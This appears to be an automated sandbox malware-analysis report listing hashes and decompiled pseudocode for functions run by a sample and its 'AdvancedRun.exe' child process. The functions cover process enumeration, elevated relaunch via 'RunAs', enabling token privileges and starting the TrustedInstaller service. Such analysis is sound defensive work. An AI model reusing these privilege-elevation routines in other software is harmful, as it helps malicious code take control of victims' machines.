Opcode Fuzzy Hash: 9312be2b78cb2fe053e7cd5a4b3d1ef990b6e1550a0ed110df9748e03ad17b13
Instruction Fuzzy Hash: B9410EB4D0420CCFDB14CFA9D984AEEBBF1BB49718F20912AE415BB250D7749885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 011491D8, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bc96066304504b07e3d4a13d89614b9620b240348734447d96a9bd863f9981
Instruction ID: 8c7a64c33ff7a94bab35fcdd710a77b1ca476a02e15bffc270333f9fc5f1114c
Opcode Fuzzy Hash: 51bc96066304504b07e3d4a13d89614b9620b240348734447d96a9bd863f9981
Instruction Fuzzy Hash: BC41FCB4D0420C8FDB14CFA9D984AEEBBF1BB49718F20912AE415BB250D7749885CF85

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 46D6.exe PID: 5104 Parent PID: 3424 46D6.exeCOMMON

Executed Functions

Function 02C3003C, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C3024D

Strings

kernel32.dll, xrefs: 02C3008F, 02C30095
cess, xrefs: 02C3018D

Memory Dump Source

Source File: 00000018.00000002.887945829.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: e9a0c0a82c3797c57ebcb4d7bd92802683aaa0438344cc5cd7084e6975d826ac
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: F5527975A00229DFDB65CF58C984BACBBB1BF09304F1484D9E90DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02C30DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C30223,?,?), ref: 02C30E02
SetErrorMode.KERNELBASE(00000000,?,?,02C30223,?,?), ref: 02C30E07

Memory Dump Source

Source File: 00000018.00000002.887945829.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: b066716386e9b62a47e628ea0cbc1d86035fed154c234dc3fca8f79723e912cf
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 42D0123224512C77D7012A94DC09BCD7B5C9F05B66F008011FB0DD9581C7709A4046E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: AdvancedRun.exe PID: 2812 Parent PID: 6448 AdvancedRun.exeCOMMON

Executed Functions

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x00409609
0x0040960f
0x00409619
0x00409623
0x0040962e
0x00409633
0x00409640
0x0040964a
0x00409782
0x0040978c
0x00409793
0x00000000
0x00000000
0x0040965a
0x0040965f
0x00409678
0x0040967e
0x00409681
0x00409685
0x00409688
0x004096b2
0x004096bf
0x004096c6
0x004096cb
0x004096da
0x004096e6
0x0040973b
0x00409747
0x0040975f
0x00409764
0x0040976a
0x00409770
0x00409773
0x0040977d
0x00000000
0x0040977d
0x004096ee
0x004096f5
0x004096fc
0x00409704
0x0040970c
0x0040971c
0x0040971c
0x00409704
0x00409721
0x00409728
0x00409739
0x00409739
0x00000000
0x00409728
0x00409693
0x00000000
0x00000000
0x004096a5
0x004096a9
0x004096ac
0x00000000
0x00000000
0x00000000
0x004096ac
0x004097a6

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

kernel32.dll, xrefs: 004096F7
QueryFullProcessImageNameW, xrefs: 00409706

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

0x00401c31
0x00401c33
0x00401c48
0x00401c4f
0x00401c61
0x00401c68
0x00401c74
0x00401c79
0x00401c7a
0x00401c7b
0x00401c84
0x00401c89
0x00401c8e
0x00401c8f
0x00401c9b
0x00401ca6
0x00401caf
0x00401cb9
0x00401cc0
0x00401cc7
0x00401cce
0x00401cd5
0x00401cdd
0x00401ce0
0x00401d14
0x00401ce2
0x00401ce8
0x00401cf3
0x00401cf6
0x00401cfe
0x00401d09
0x00401d09
0x00401cfe
0x00401d1b

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNELBASE ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

<, xrefs: 00401CB9
@, xrefs: 00401CC7
RunAs, xrefs: 00401CC0
/SpecialRun %I64x %d, xrefs: 00401C84

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

0x00408fc9
0x00408fd0
0x00408fe8
0x00000000
0x00408fea
0x00408ff4
0x00409001
0x00409003
0x0040900c
0x0040900e
0x00409010
0x0040901a
0x0040901a
0x00409010
0x0040901f
0x00409026
0x0040902d
0x00409030
0x00409035
0x00409037
0x00409040
0x00409042
0x00409044
0x00409051
0x00409051
0x00409044
0x00409053
0x0040905e
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

AdjustTokenPrivileges, xrefs: 00409039
LookupPrivilegeValueW, xrefs: 00409005

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040a348
0x0040a34e
0x0040a352
0x0040a35f
0x0040a363
0x0040a369
0x0040a371
0x0040a374
0x0040a37c
0x0040a380
0x0040a383
0x0040a386
0x0040a388
0x0040a388
0x0040a38c
0x0040a38f
0x0040a39f
0x0040a3a1
0x0040a3a5
0x0040a3a5
0x0040a3a9
0x0040a3aa
0x0040a3b3
0x0040a3b3
0x0040a37c
0x0040a371
0x0040a3b8
0x0040a3be

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

0x004022d5
0x004022dd
0x004022e7
0x004022ec
0x004022f7
0x004022fa
0x004022fd
0x00402300
0x00402307
0x0040230d
0x0040230e
0x00402318
0x00402321
0x00402324
0x00402327
0x0040232a
0x0040232d
0x00402334
0x00402337
0x0040233e
0x0040234f
0x00402356
0x0040235b
